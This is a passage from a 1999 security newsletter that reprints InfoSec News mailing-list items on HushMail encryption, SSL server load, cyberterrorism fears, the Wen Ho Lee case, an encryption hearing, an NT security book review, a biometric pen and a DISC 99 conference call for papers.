- may create a climate to encourage independent research in information
- assurance," the NSA said.The agency said the decision to launch the
- information-assurance program represented an attempt to reach out and form
- partnerships with industry pursuant to a Clinton administration directive
- last year on critical infrastructure protection.The seven centers will be
- formally recognized during a conference on information-security systems
- scheduled for May 25 to 29 at IBM's conference facility in Palisades, N.Y.
-
-
- <http://www.techweb.com/wire/story/TWB19990512S0005 >
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
-
- @HWA
-
- 31.0 [ISN] HushMail: free Web-based email with bulletproof encryption
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Sat, 22 May 1999 06:16:04 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] HushMail: free Web-based email with bulletproof encryption
-
- Forwarded From: Keith Dawson <dawson@world.std.com>
-
-
- 1999-05-19:
-
-
- ..HushMail: free Web-based email with bulletproof encryption
-
-
- Hush Communications has quietly begun beta testing a significant
- development in email privacy. HushMail [1] works like Hotmail or
- Rocketmail -- you can set up multiple free accounts and access them from
- any Web browser anywhere -- but when you email another HushMail user your
- communication is protected by unbreakable encryption. The crypto,
- implemented in a downloadable Java applet, was developed outside of US
- borders and so has no export limitations.
-
-
- Here are the FAQ [2] and a more technical overview [3] of the Hush- Mail
- system.
-
-
- HushMail public and private keys are 1024 bits long, and are stored on a
- server located in Canada. All information sent between the HushApplet and
- the HushMail server is encrypted via the Blowfish symmetric 128-bit
- algorithm. The key to this symmetric pipe is randomly generated each
- session by the server and is transferred to the client machine over a
- secure SSL connection.
-
-
- When you sign on as a new user you can choose an anonymous account or an
- identifiable one. For the latter you have to fill out a demographic
- profile, to make you more attractive (in the aggregate) to HushMail's
- advertisers. The HushApplet walks you through generating a public-private
- key-pair. The process is fun and slick as a smelt. You need to come up
- with a secure pass-phrase, and in this process HushMail gives only minimal
- guidance. You might want to visit Arnold Reinhold's Diceware page [4],
- where he lays out a foolproof pass- phrase protocol utilizing a pair of
- dice.
-
-
- HushMail relies heavily on Java (JVM 1.1.5 or higher), so it can only be
- used with the latest browsers. The earliest workable version of Netscape's
- browser is 4.04, but some features don't work in versions before 4.07; the
- latest version, 4.5, is best. For Internet Explorer users, 4.5 is
- recommended, but the latest Windows release of IE 4.0 (subversion
- 4.72.3110) works as well. Red Hat Linux version 5.2 is also tested and
- supported. Unfortunately, HushMail does not work on Macintoshes, due to
- limitations in Apple's Java implementation. (Mac users can crawl HushMail
- under Connectix Virtual PC. Note that I don't say "run." I've tried this
- interpretation-under-emulation and do not recommend it.) The company is
- trying urgently to connect with the right people at Apple to get this
- situation remedied.
-
-
- One of the limitations of this early release of HushMail is that
- encryption can only be used to and from another HushMail account. It is
- not currently possible to export your public/private key-pair, to set up
- automatic forwarding of mail sent to a HushMail account, or to import
- non-Hush public keys. I spoke with Cliff Baltzley, Hush's CEO and chief
- technical wizard. He stresses that Hush's desire and intention is to move
- toward interoperability with other players in the crypto world, such as
- PGP and S/MIME. The obstacles to doing so are the constraints on technical
- resources (read: offshore crypto programmers) and legal questions of
- intellectual property. Baltzley believes that HushMail's positive impact
- on privacy worldwide will be enhanced by maximizing the product's
- openness.
-
-
- [1] https://www.hushmail.com/
- [2] https://www.hushmail.com/faq.htm
- [3] https://www.hushmail.com/tech_description.htm
- [4] http://world.std.com/~reinhold/diceware.html
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
-
- @HWA
-
- 32.0 [ISN] E-Biz Bucks Lost Under SSL Strain
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Sat, 22 May 1999 06:17:04 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] E-Biz Bucks Lost Under SSL Strain
-
-
- http://www.internetwk.com/lead/lead052099.htm
-
-
- Thursday, May 20, 1999
- E-Biz Bucks Lost Under SSL Strain
- By TIM WILSON
-
-
- A customer stuffs his shopping cart with goodies from your Web site.
- Credit card in hand, he waits for a secure connection to consummate the
- deal. And waits. Finally, short of patience, he dumps the contents and
- logs off.
-
-
- It may sound like an e-commerce manager's nightmare, but according to the
- latest Web server performance statistics, it's an increasingly common
- phenomenon.
-
-
- The ghost in the machine is Secure Sockets Layer, the commonly used method
- of securing communications between users and Web sites.
-
-
- Recent tests conducted by researcher Networkshop Inc. indicate that
- powerful Web servers capable of handling hundreds of transactions per
- second may be brought to a near standstill by heavy SSL traffic. Some
- server configurations suffered as much as a fiftyfold degradation in
- performance from SSL, down to just a few transactions per second,
- according to analyst Alistair Croll at Networkshop.
-
-
- The growing problem of SSL performance has driven vendors to develop
- devices that can help share the Web server's processing load. IPivot Inc.
- next month will ship two new processors that can offload authentication
- and encryption on e-commerce sites.
-
-
- IT managers and other experts have known for years that SSL, which
- requires the authentication and encryption of Web server connections, can
- significantly slow site performance. But the problem is rapidly becoming
- more chronic as companies increase secured Web transactions, they said.
-
-
- "Our business is very seasonal, and a lot of it is concentrated in the
- fourth quarter. This past December, we found ourselves shuffling servers
- around to handle the load," said Stephen McCollum, network architect at
- Hewitt Associates. The $858 million company manages benefits plans for
- large organizations, and because Hewitt's Web traffic is personal and
- confidential, virtually all of it is conducted via SSL.
-
-
- Hewitt is far from alone in its reliance on SSL. According to a study
- conducted by research company Netcraft Ltd., SSL implementations doubled
- from 15,000 sites to more than 35,000 sites between 1998 and 1999. And
- many of those server sites are struggling under the load.
-
-
- "I'd guess that somewhere between 10 and 25 percent of [e-commerce]
- transactions are aborted because of slow response times," said Rodney
- Loges, vice president of business development at Digital Nation, a Web
- hosting company.
-
-
- That translates to as much as $1.9 billion in lost revenue, using
- Forrester Research numbers for 1998 of $7.8 billion in e-retail sales.
-
-
- According to Networkshop, even the most powerful, general-purpose Web
- server hardware can be dragged down by large volumes of SSL traffic. In
- its most recent tests, the research company found that a typical Pentium
- server configuration running Linux and Apache, which at full capacity can
- handle about 322 connections per second of standard HTTP traffic, fell to
- about 24 connections per second when handling a full load of SSL traffic.
-
-
- A similar test conducted on a Sun 450 server running Solaris and Apache
- experienced even more trouble. The server handled about 500 connections
- per second of HTTP traffic at full capacity, but only about 3 connections
- per second when the traffic was secured via SSL. Networkshop tests of
- quad-processor configurations showed that those performance ratios scale
- to multiserver environments as well, Croll said.
-
-
- A few vendors, such as Rainbow Technologies Inc., have solved the problem
- by offloading security processing onto a dedicated co-processor card that
- slips into a server. But as SSL traffic increases, adding and managing
- co-processor boards becomes unwieldy, IT managers said. "We found that the
- [co-processor] cards were kind of a kludge, because they have to be added
- to every server," said Digital Nation's Loges.
-
-
- IPivot will begin shipping two external SSL processors--the Commerce
- Accelerator 1000 and the Commerce Director 8000, which includes IPivot's
- load-balancing system--to help eliminate SSL bottlenecks.
-
-
- The Commerce Accelerator 1000 is priced at $9,995; the Commerce Director
- 8000 costs $39,950.
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
-
- @HWA
-
- 33.0 [ISN] Bracing for guerrilla warfare in cyberspace
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Sat, 22 May 1999 06:22:31 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] Bracing for guerrilla warfare in cyberspace
-
-
-
- [Moderator: Warning - A fair share of FUD in this article.]
-
-
-
- Forwarded From: Sunit Nangia <sunit@cerf.net>
-
-
- http://www.cnn.com/TECH/specials/hackers/cyberterror/
-
-
- Bracing for guerrilla warfare in cyberspace
- 'There are lots of opportunities; that's very scary'
-
-
- April 6, 1999
- By John Christensen
- CNN Interactive
-
-
- (CNN) -- It is June, the children are out of school, and as highways and
- airports fill with vacationers, rolling power outages hit sections of Los
- Angeles, Chicago, Washington and New York. An airliner is mysteriously
- knocked off the flight control system and crashes in Kansas.
-
-
- Parts of the 911 service in Washington fail, supervisors at the Department
- of Defense discover that their e-mail and telephone services are disrupted
- and officers aboard a U.S. Navy cruiser find that their computer systems
- have been attacked.
-
-
- As incidents mount, the stock market drops precipitously, and panic surges
- through the population.
-
-
- Unlikely? Hardly. The "electronic Pearl Harbor" that White House terrorism
- czar Richard A. Clarke fears is not just a threat, it has already
- happened.
-
-
- Much of the scenario above -- except for the plane and stock market
- crashes and the panic -- occurred in 1997 when 35 hackers hired by the
- National Security Agency launched simulated attacks on the U.S.
- electronic infrastructure.
-
-
- "Eligible Receiver," as the exercise was called, achieved "root level"
- access in 36 of the Department of Defense's 40,000 networks. The simulated
- attack also "turned off" sections of the U.S. power grid, "shut down"
- parts of the 911 network in Washington, D.C., and other cities and gained
- access to systems aboard a Navy cruiser at sea.
-
-
- At a hearing in November 1997, Sen. Jon Kyl, R-Arizona, chairman of a
- Senate technology subcommittee, reported that nearly two-thirds of U.S.
- government computers systems have security holes.
-
-
- "If somebody wanted to launch an attack," says Fred B. Schneider, a
- professor of computer science at Cornell University, "it would not be at
- all difficult."
-
-
- 'There are lots of opportunities'
-
-
- Although "Eligible Receiver" took place in the United States, which has
- about 40 percent of the world's computers, the threat of cyberterrorism is
- global.
-
-
- Consider:
-
-
- * During the Gulf War, Dutch hackers stole information about U.S. troop
- movements from U.S. Defense Department computers and tried to sell it to
- the Iraqis, who thought it was a hoax and turned it down.
-
-
- * In March 1997, a 15-year-old Croatian youth penetrated computers at a
- U.S. Air Force base in Guam.
-
-
- * In 1997 and 1998, an Israeli youth calling himself "The Analyzer"
- allegedly hacked into Pentagon computers with help from California
- teen-agers. Ehud Tenebaum, 20, was charged in Jerusalem in February 1999
- with conspiracy and harming computer systems.
-
-
- * In February 1999, unidentified hackers seized control of a British
- military communication satellite and demanded money in return for control
- of the satellite.
-
-
- The report was vehemently denied by the British military, which said all
- satellites were "where they should be and doing what they should be
- doing." Other knowledgable sources, including the Hacker News Network,
- called the hijacking highly unlikely.
-
-
- "There are lots of opportunities," says Schneider. "That's very scary."
-
-
- 'The Holy Grail of hackers'
-
-
- President Clinton announced in January 1999 a $1.46 billion initiative to
- deal with U.S. government computer security -- a 40 percent increase over
- fiscal 1998 spending. Of particular concern is the Pentagon, the military
- stronghold of the world's most powerful nation.
-
-
- "It's the Holy Grail of hackers," says computer security expert Rob Clyde.
- "It's about bragging rights for individuals and people with weird
- agendas."
-
-
- Clyde is vice president and general manager of technical security for
- Axent Technologies, a company headquartered in Rockville, Maryland, that
- counts the Pentagon as one of its customers.
-
-
- The Defense Department acknowledges between 60 and 80 attacks a day,
- although there have been reports of far more than that.
-
-
- The government says no top secret material has ever been accessed by these
- intruders, and that its most important information is not online. But the
- frustration is evident.
-
-
- Michael Vatis, director of the FBI's National Infrastructure Protection
- Committee, told a Senate subcommittee last year that tracing cyberattacks
- is like "tracking vapor."
-
-
- 'A lot of clueless people'
-
-
- Schneider says the "inherently vulnerable" nature of the electronic
- infrastructure makes counterterrorism measures even more difficult.
- Schneider chaired a two-year study by the National Academy of Sciences and
- the National Academy of Engineering that found that the infrastructure is
- badly conceived and poorly secured.
-
-
- "There is a saying that the amount of 'clue' [knowledge] on the Internet
- is constant, but the size of the Internet is growing exponentially," says
- Schneider. "In other words, there are a lot of clueless people out there.
- It's basically a situation where people don't know how to lock the door
- before walking out, so more and more machines are vulnerable."
-
-
- Schneider says the telephone system is far more complicated than it used
- to be, with "a lot of nodes that are programmable, and databases that can
- be hacked." Also, deregulation of the telephone and power industries has
- created another weakness: To stay competitive and cut costs, companies
- have reduced spare capacity, leaving them more vulnerable to outages and
- disruptions in service.
-
-
- Still another flaw is the domination of the telecommunications system by
- phone companies and Internet service providers (ISPs) that don't trust
- each other. As a result, the systems do not mesh seamlessly and are
- vulnerable to failures and disruptions.
-
-
- "There's no way to organize systems built on mutual suspicion," Schneider
- says. "We're subtly changing the underpinnings of the system, but we're
- not changing the way they're built. We'll keep creating cracks until we
- understand that we need a different set of principles for the components
- to deal with each other."
-
-
- 'The democratization of hacking'
-
-
- Meanwhile, the tools of mayhem are readily available.
-
-
- There are about 30,000 hacker-oriented sites on the Internet, bringing
- hacking -- and terrorism -- within the reach of even the technically
- challenged.
-
-
- "You no longer have to have knowledge, you just have to have the time,"
- Clyde says. "You just download the tools and the programs. It's the
- democratization of hacking. And with these programs ... they can click on
- a button and send bombs to your network, and the systems will go down."
-
-
- Schneider says another threat is posed not by countries or terrorists, but
- by gophers and squirrels and farmers.
-
-
- In 1995, a New Jersey farmer yanked up a cable with his backhoe, knocking
- out 60 percent of the regional and long distance phone service in New York
- City and air traffic control functions in Boston, New York and Washington.
- In 1996, a rodent chewed through a cable in Palo Alto, California, and
- knocked Silicon Valley off the Internet for hours.
-
-
- "Although the press plays up the security aspect of hacker problems,"
- says Schneider, "the other aspect is that the systems are just not built
- very reliably. It's easy for operators to make errors, and a gopher
- chewing on a wire can take out a large piece of the infrastructure. That's
- responsible for most outages today."
-
-
- 'The prudent approach'
-
-
- Schneider and Clyde favor a team of specialists similar to Clinton's
- proposed "Cyber Corps" program, which would train federal workers to
- handle and prevent computer crises. But they say many problems can be
- eliminated with simple measures.
-
-
- These include "patches" for programs, using automated tools to check for
- security gaps and installing monitoring systems and firewalls. Fixes are
- often free and available on the Internet, but many network administrators
- don't install them.
-
-
- A step toward deterrence was taken in 1998 when CIA Director George Tenet
- announced that the United States was devising a computer program that
- could attack the infrastructure of other countries.
-
-
- "That's nothing new," says Clyde, "but it's the first time it was publicly
- announced. If a country tries to destroy our infrastructure, we want to be
- able to do it back. It's the same approach we've taken with nuclear
- weapons, the prudent approach."
-
-
- The U.S. Government Accounting Office estimates that 120 countries or
- groups have or are developing information warfare systems. Clyde says
- China, France and Israel already have them, and that some Pentagon
- intrusions have surely come from abroad.
-
-
- "We don't read about the actual attacks," says Clyde, "and you wouldn't
- expect to."
-
-
- "The Analyzer" was caught after he bragged about his feat in computer chat
- rooms, but Clyde says the ones to worry about are those who don't brag and
- don't leave any evidence behind.
-
-
- "Those are the scary ones," he says. "They don't destroy things for the
- fun of it, and they're as invisible as possible."
-
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
-
- @HWA
-
-
- 34.0 [ISN] Prosecuting Lee Is Problematic
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 00:05:43 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] Prosecuting Lee Is Problematic
-
-
- http://www.washingtonpost.com/wp-srv/WPlate/1999-05/24/080l-052499-idx.html
-
-
- Prosecuting Lee Is Problematic
- Physicist's Mishandling of Computer Data May Not Be Crime
- By Vernon Loeb and Walter Pincus
- Washington Post Staff Writers
- Monday, May 24, 1999; Page A05
-
-
- Espionage suspect Wen Ho Lee's transfer of top secret computer programs
- from a classified to a vulnerable computer network at Los Alamos National
- Laboratory has left federal prosecutors wrestling with the question of
- whether such mishandling of classified information in cyberspace
- constitutes a crime.
-
-
- Lacking evidence of espionage, FBI agents have focused on Lee's
- unauthorized data transfer ever since they searched his desktop computer
- in March and discovered top secret "legacy codes" in a system that could
- have been accessed by hackers.
-
-
- But there is no known prosecution of anyone for transferring classified
- data from classified to unclassified government computer systems, leaving
- prosecutors to fathom the frontiers of cybersecurity under espionage
- statutes that make no reference to computers, according to lawyers
- specializing in national security law and U.S. officials familiar with the
- case.
-
-
- Lee, 59, a Taiwan-born nuclear physicist who is a U.S. citizen, was fired
- March 8 for alleged security violations at Los Alamos and identified by
- U.S. officials as an espionage suspect, despite their inability to charge
- him as a spy for China. Congress is investigating why the FBI and the
- Justice Department failed to search his office computer prior to his
- dismissal.
-
-
- That slow response drew more criticism yesterday. The chairman of the
- Senate intelligence committee, Richard C. Shelby (R-Ala.), renewed his
- call for the ouster of Attorney General Janet Reno. Branding her handling
- of the case "indefensible," Shelby said on CBS's "Face the Nation" that
- "the attorney general ought to resign and she ought to take her top
- lieutenants with her."
-
-
- On the same show, Sen. Robert G. Torricelli (D-N.J.) also criticized Reno,
- although he stopped short of advocating resignation: "It's time for
- President Clinton to have a conversation with the attorney general about
- her ability to perform her duties and whether or not it is in the national
- interest for her to continue." Torricelli said Reno had displayed
- "failures of judgment" that were "inexplicable." He singled out her
- decision not to approve a wire tap of Lee "despite overwhelming evidence
- that there was probable cause and that the national security was being
- compromised."
-
-
- White House spokesman Barry Toiv said Clinton "has full confidence in
- Attorney General Reno," Reuters reported.
-
-
- Lee has denied passing classified information to China and has said
- through his attorney he took "substantial steps" to safeguard the
- transferred computer codes.
-
-
- A provision of the federal espionage statute makes the removal of
- classified defense information from its "proper place of custody" through
- "gross negligence" a felony punishable by up to 10 years in prison,
- according to lawyers specializing in national security cases.
-
-
- But it is unclear whether Lee could be charged under that provision,
- absent intent on his part to make unlawful use of the data or evidence it
- was obtained by unauthorized individuals, they said.
-
-
- "You've got a clear security breech," said former CIA inspector general
- Frederick Hitz. "But as far as a criminal prosecution . . . I would think
- that's going to be tough."
-
-
- Another law makes the "unauthorized removal and retention of classified
- documents or material" at one's home a misdemeanor punishable by a maximum
- $1,000 fine and one-year prison sentence. The measure was enacted to
- safeguard classified materials against careless handling, not espionage.
-
-
- Two former National Security Agency employees, a husband and wife, were
- the first to be prosecuted under the law last year, pleading guilty to
- having retained classified documents at their home after leaving
- government service.
-
-
- But the lawyers specializing in national security cases say they do not
- believe the statute could be used against Lee, because he apparently did
- not remove the programs from government property.
-
-
- They said in two recent cases involving computer transfers of classified
- information, one involving another Los Alamos scientist and the other,
- former CIA director John M. Deutch, the Justice Department declined
- prosecution.
-
-
- The scientist at Los Alamos, who has not been publicly identified, moved
- classified nuclear weapons data last year from the laboratory's classified
- to its unclassified network in a transfer analogous to that performed by
- Lee.
-
-
- But the transfer was ultimately determined to have been "inadvertent,"
- according to a senior Energy Department official. The FBI found no
- criminal intent and closed the case, the official said.
-
-
- Deutch was investigated by the Justice Department for transferring more
- than 30 classified documents to his personal, unsecured laptop during his
- tenure as CIA director from May 1995 to December 1996. The security breach
- was discovered when CIA specialists went to his Washington home to remove
- a classified computer and safe and discovered the classified files on his
- personal computer.
-
-
- Under CIA policy, Deutch's security violation was forwarded to Justice for
- review, but officials there declined prosecution. The case was recently
- recently returned to the CIA for review by Inspector General Britt Snider,
- who is expected to complete a report on the matter soon.
-
-
- Deutch, who does government consulting and teaches at Massachusetts
- Institute of Technology, could have his security clearance lifted for a
- period of time, one government source said.
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 35.0 [ISN] Slip of the Tongue Lightens up Encryption Hearing
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 00:01:24 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] Slip of the Tongue Lightens up Encryption Hearing
-
-
-
- http://www.nytimes.com/library/tech/99/05/cyber/articles/25capital.html
-
-
- May 25, 1999
- Slip of the Tongue Lightens up Encryption Hearing
- By JERI CLAUSING
-
-
- WASHINGTON -¡ The Clinton Administration's point man on encryption policy
- silenced his Congressional critics ¡- momentarily, anyway -- with a slip
- of the tongue at a House hearing last week.
-
-
- "Never underestimate the stupidity of some of the people we have to deal
- with," William A. Reinsch, Under Secretary of Commerce for the Bureau of
- Export Administration, said while being grilled about whether terrorists
- and criminals would be na∩ve enough to use the technology being pushed by
- the Administration.
-
-
- The House International Relations subcommittee meeting fell silent and
- Reinsch turned bright red as he realized the double meaning of what he had
- said. As the silence turned to laughter, Reinsch tried to backtrack,
- blurting, "I didn't say that."
-
-
- But it was enough to silence Representative Bradley J. Sherman. Sherman
- promptly ended his grilling of Reinsch, who along with representatives of
- the National Security Agency and the Federal Bureau of Investigation, was
- testifying in defense of the Administration's encryption policy. The
- Administration has tied any loosening of export controls on strong
- encryption to the development of technology that would guarantee law
- enforcement easy access to criminals' communications.
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 36.0 [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 00:03:24 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] REVIEW: "Microsoft Windows NT 4.0 Security, Audit, and Control",
-
-
- Forwarded From: "Rob Slade" <rslade@sprint.ca>
-
-
- BKWNTSAC.RVW 990409
-
-
- "Microsoft Windows NT 4.0 Security, Audit, and Control", James G.
- Jumes et al, 1999, 1-57231-818-X, U$49.99/C$71.99/UK#45.99
- %A James G. Jumes
- %A Neil F. Cooper
- %A Paula Chamoun
- %A Todd M. Feinman
- %C 1 Microsoft Way, Redmond, WA 98052-6399
- %D 1999
- %G 1-57231-818-X
- %I Microsoft Press
- %O U$49.99/C$71.99/UK#45.99 800-6777377 fax: 206-936-7329
- %P 318 p.
- %S Technical Reference
- %T "Microsoft Windows NT 4.0 Security, Audit, and Control"
-
-
- The primary audience described in the introduction seems to be security
- professionals. However, system administrators, technology managers, and
- CIOs are mentioned as well. The attempt at breadth of coverage usually
- does not bode well in works like these.
-
-
- Chapter one discusses an information security model based upon the
- business (and other) objectives of the institution in question. While
- valid as far as it goes, and even possibly helpful when formulating
- security policy, this by no means provides a structure from which to view
- either security policy or procedures, let alone implement a complex set of
- controls. The widget company, beloved of management writers, is described
- in chapter two. For the purposes of assessing security in real world
- working environments, this particular widget company seems to be
- astoundingly simple and homogeneous.
-
-
- Chapter three starts out talking reasonably about security policy, starts
- to get flaky in risk assessment (I would definitely worry about a .45
- chance of an earthquake), and tails off into trivia. Monitoring, in
- chapter four, looks first at system performance and diagnostics, and then
- gets into event logging without really going into the concepts. Many
- areas of physical security are left uncovered in chapter five. Chapter
- six discusses domains, trust relationships, and remote access permissions.
- Dialogue boxes for user accounts and groups are listed in chapter seven.
- There is some mention of the commonly "received wisdom" in regard to these
- topics, as there is in chapter eight regarding account policies, but
- nothing very significant. File system, share, and other resource control
- is covered in chapter nine. Chapter ten is a bit of a grab bag without
- much focus. The registry is reviewed in chapter eleven. Chapter twelve
- looks briefly at power supplies and backups. Although it talks about
- auditing, chapter thirteen is more of a checklist of security features to
- think about. Appendix A is a bit better in this regard: it lists
- recommended settings across a number of functions for six different types
- of systems.
-
-
- There is some discussion of options as the various functions are
- addressed, so, in a sense, this is a start towards full coverage of NT
- security. It has a long way to go, though. In addition, the deliberation
- comes at the cost of a loss of some detail in terms of security
- implementation.
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 37.0 [ISN] LCI Intros SMARTpen Biometric Signature Authentication
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 01:22:36 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] LCI Intros SMARTpen Biometric Signature Authentication
-
-
- Forwarded From: 7Pillars Partners <partners@sirius.infonex.com>
-
-
- LCI Intros SMARTpen Biometric Signature Authentication
-
-
- S'HERTGENBOSCH, NETHERLANDS, 1999 MAY 24 (NB)
- By Sylvia Dennis, Newsbytes.
-
- LCI Technology has taken the wraps off its SMARTpen biometric signature
- authentication system. The SMARTpen is billed as the world's first
- wireless signature device and the only biometric unit of its type that
- writes on normal paper.Sam Asseer, the firm's chairman, said that the unit
- was designed for high-end security transactions. It is, he explained, a
- wireless embedded computer system that looks and writes like a common
- ballpoint pen.
-
- In use, the SMARTpen uses built-in sensors that enable the authentication
- of users through the biometric characteristics of their signatures on
- regular paper.
-
- "Electronic commerce is rapidly becoming the way the world does business,"
- he said, adding that the surge in online transactions over the past two
- years and the predictions for explosive growth going into the year 2000
- suggests that the future of e-commerce is unlimited.
-
- "But, as the number of Internet transactions increases, there is an even
- greater demand for security to ensure confidentiality and prevent fraud.
- Biometric authentication systems like the LCI SMARTpen help create the
- secure environment necessary for the continued expansion of global
- e-commerce," he said.
-
- According to the firm, the SMARTpen measures individual signature
- characteristics, encrypts the data and transmits it via radio frequency to
- a computer, where LCI software compares it to a template for verification
- - all in about three seconds.
-
- The firm claims that the dynamics of signatures as measured by the
- SMARTpen are personal and not directly visible from the written image.
-
- This, the firm says, makes it virtually impossible for forged signatures
- to get through the SMARTpen system. The system works with standard APIs
- (application programming interfaces) and the false rejection/false
- acceptance rate can be adjusted by system parameters, so adding
- flexibility.
-
- Pricing on the SMARTpen is expected to range from $100 to $250, depending
- on the model and configuration of the product.
-
- According to LCI, the price includes the pen and software components. The
- SMARTpen also has integral sensors, a mouse, a digital signal processor,
- radio transmitter and receiver, and encryption system.
-
- LCI's Web site is at http://www.smartpen.net .
-
-
- -o-
- Subscribe: mail majordomo@repsec.com with "subscribe isn".
- Today's ISN Sponsor: OSAll [www.aviary-mag.com]
-
- @HWA
-
- 38.0 [ISN] CFP: DISC 99 Computer Security 99
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Thu, 27 May 1999 02:31:07 -0600 (MDT)
- From: cult hero <jericho@dimensional.com>
- To: InfoSec News <isn@repsec.com>
- Subject: [ISN] CFP: DISC 99 Computer Security 99
-
-
-
- Forwarded From: Juan Carlos Guel Lopez <cguel@martini.super.unam.mx>
-
-
-
- .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
-
-
- ____ ___ ____ ____ ___ ___
- | _ \_ _/ ___| / ___| / _ \ / _ \
- | | | | |\___ \| | | (_) | (_) |
- | |_| | | ___) | |___ \__, |\__, |
- |____/___|____/ \____| /_/ /_/
-
-
-
- C o m p u t e r S e c u r i t y 9 9
-
-
- "Working Together"
-
-
- October 4-8, 1999
-
-
- Palacio de Miner'ia, M'exico City, M'exico.
-
-
- .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---' .---'
-
-
- C A L L F O R P A R T I C I P A T I O N
-
-
- The goal of Computer Security 99 (DISC 99) is to create awareness in
- the computer user community about security strategies and mechanisms
- used to protect information.
-
-
- For the second consecutive year the DISC takes place alongside the
- most important computing event of Mexico, the computing general
- congress Computo.99@mx (http://www.computo99.unam.mx/), and invites
- specialists in computer security to participate.
-
-
- "Working Together" is the slogan for this year's event, suggesting
- that security in the organization can only exist and be increased with
- the work of all the people in the organization, including users,
- management and security personnel.
-
-
- The community is invited to participate in the DISC 99 event through
- the presentation of theoretical, technical, and applied works and
- those who presents practical experience in the following topics (but
- not limited to them):
-
-
- @ > Electronic commerce
-
-
- - Certification
- - Digital cash
- - New protocols
- - Secure transactions
-
-
- @ > New Firewall technologies
- @ > World Wide Web security
-
-
- - Secure Sockets Layer (SSL)
-
- @ > Network security
- @ > Security for software developers
- @ > Security in distributed systems and data bases
- @ > Security in agents and multi-platform languages
- @ > Incident response teams
- @ > Computer security incident handling, prevention and coordination
- @ > Administrative and legal issues in the incident handling
- @ > Software protection and intellectual property
- @ > New tools for incident handling
- @ > Attacks and intrusion detection
- @ > Computer attacks
- @ > Privacy and cryptography protocols
- @ > Security policies
-
-
- .......................
- Who should attend ?
- .......................
-
-
- * System administrators who are interested in Computer
- Security.
-
-
- * People working in the field of Computer Security,
- and handling Computer Security incidents.
-
-
- * Anybody who is interested in Computer Security and wants to
- meet another interested people. This event will help him or
- her to improve security programs, security plans, and
- security tools by sharing and getting a wide experience and
- knowledge.
-
-
- * People who want to establish incident response teams.
-
-
- * Anybody who has a particular interest in network security,
- monitoring tools, intrusion detection and firewalls.
-
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
- Important Dates
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
-
-
- Paper submissions: July 2
- Acceptance notification: August 6
- Final papers due: August 20
- Event Dates: October 4-8
-
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
- Workshop Format
-
-
- ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' ' '
-
-
-
- There will be tutorial-style presentations during October 4 and 5.
- October 6, 7 and 8 will consist of conference papers and workshop-style
- presentations, as well as business sessions.
-
-
- Two evenings are allocated for participants to hold events devoted to
- subjects of particular interest ("birds of a feather" sessions).
-
-
- Contributions should follow the following guidelines:
-
-
- 1. Tutorials: Half or full day tutorial proposals will be
- considered.
- 2. Papers: Written papers may be as long as desired, but
- presentations must be limited to 30 minutes.
- 3. Workshops: These informal sessions should either follow a more
- "hands-on" approach or provide for a high degree of
- audience participation. They should be tailored to
- address specific issues and should be from 60 to 90
- minutes in duration. Panel Sessions on a particular
- topic are also acceptable.
-
-
